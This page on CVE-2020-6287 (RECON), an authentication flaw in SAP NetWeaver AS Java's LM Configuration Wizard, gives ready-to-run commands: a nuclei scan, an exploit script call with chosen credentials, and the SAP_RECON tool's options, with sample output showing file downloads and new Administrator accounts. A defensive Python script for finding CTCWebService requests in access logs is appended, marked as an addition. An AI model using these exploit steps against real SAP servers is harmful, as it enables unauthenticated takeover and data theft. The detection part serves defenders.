SAP NetWeaver AS JAVA: Arbitrary User Creation

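    Vulnerability Overview

    The LM Configuration Wizard in SAP NetWeaver AS Java lacks authentication, so an unauthenticated remote attacker can perform harmful operations, including but not limited to creating an administrator user. The attacker may gain access to adm, the operating system user that has unrestricted access to all local resources related to the SAP system.

    Affected Versions

    SAP NetWeaver AS JAVA (LM Configuration Wizard) 7.30
    SAP NetWeaver AS JAVA (LM Configuration Wizard) 7.31
    SAP NetWeaver AS JAVA (LM Configuration Wizard) 7.40
    SAP NetWeaver AS JAVA (LM Configuration Wizard) 7.50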

    POC

    nuclei -tags sap -t cves/ -l urls.txt

    EXP

    python CVE-2020-6287.py http://vul-IP:50000/ test123 test@123123

    EXP (RECON.py)

    chipik/SAP_RECON: just point it at the SAP NW AS Java hostname/IP.

    There are additional options:

    1. -c - check if the SAP server is vulnerable to RECON
    2. -f - download a zip file from the SAP server
    3. -u - create a SAP JAVA user with the Authenticated User role
    4. -a - create a SAP JAVA user with the Administrator role

    Ex.: Download zip file

    python RECON.py -H 172.16.30.8 -f /1111.zip
    Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
    Ok! File zipfile_929.zip was saved

    Ex.: Create SAP JAVA user

    ~python RECON.py -H 172.16.30.8 -u
    Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
    Going to create new user. sapRpoc5484:Secure!PwD9379
    Ok! User were created

    Ex.: Create SAP JAVA Administrator user

    ~python RECON.py -H 172.16.30.8 -a
    Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
    Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
    Ok! Admin user were created
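
For detection, requests to the CTCWebService endpoint that appears in the tool output above can be searched for in HTTP access logs. The following is an added example, not part of the original page or of the SAP_RECON project; it assumes logs in Combined Log Format (for example from a reverse proxy in front of port 50000), and the sample lines and triage labels are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Path prefix of the endpoint shown in the tool output on this page (lowercased).
CTC_PREFIX = "/ctcwebservice/"

# Assumption: Combined Log Format; adapt the pattern to your own log source.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [14/Jul/2020:09:12:01 +0000] "GET /irj/portal HTTP/1.1" 200 5120
198.51.100.7 - - [14/Jul/2020:09:13:44 +0000] "GET /CTCWebService/CTCWebServiceBean HTTP/1.1" 200 9876
198.51.100.7 - - [14/Jul/2020:09:13:52 +0000] "POST /CTCWebService/CTCWebServiceBean HTTP/1.1" 200 412
203.0.113.5 - - [14/Jul/2020:10:02:10 +0000] "POST /%43TCWebService/CTCWebServiceBean HTTP/1.1" 401 0
192.0.2.20 - j.admin [14/Jul/2020:11:30:00 +0000] "POST /CTCWebService/CTCWebServiceBean HTTP/1.1" 200 380
""".splitlines()

def classify(user, status):
    """Triage label (hypothetical scheme) for one request to the CTC web service."""
    if user == "-" and 200 <= status < 300:
        return "high"    # the service answered a caller with no authenticated user
    if user == "-":
        return "probe"   # anonymous attempt that was rejected or failed
    return "review"      # authenticated caller: confirm it was a planned admin task

def find_ctc_requests(lines):
    """Return {source_ip: [(time, method, status, label), ...]} for CTC requests."""
    findings = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        # Normalise percent-encoding and case before matching the path.
        path = unquote(m["target"]).lower()
        if not path.startswith(CTC_PREFIX):
            continue
        status = int(m["status"])
        findings[m["ip"]].append((m["ts"], m["method"], status, classify(m["user"], status)))
    return dict(findings)

if __name__ == "__main__":
    for ip, events in find_ctc_requests(SAMPLE_LOG).items():
        for ts, method, status, label in events:
            print(f"{label:6} {ip:15} {ts} {method} -> {status}")
```

Any "high" hit from an address outside the administration network is worth correlating with newly created users in the Java user store.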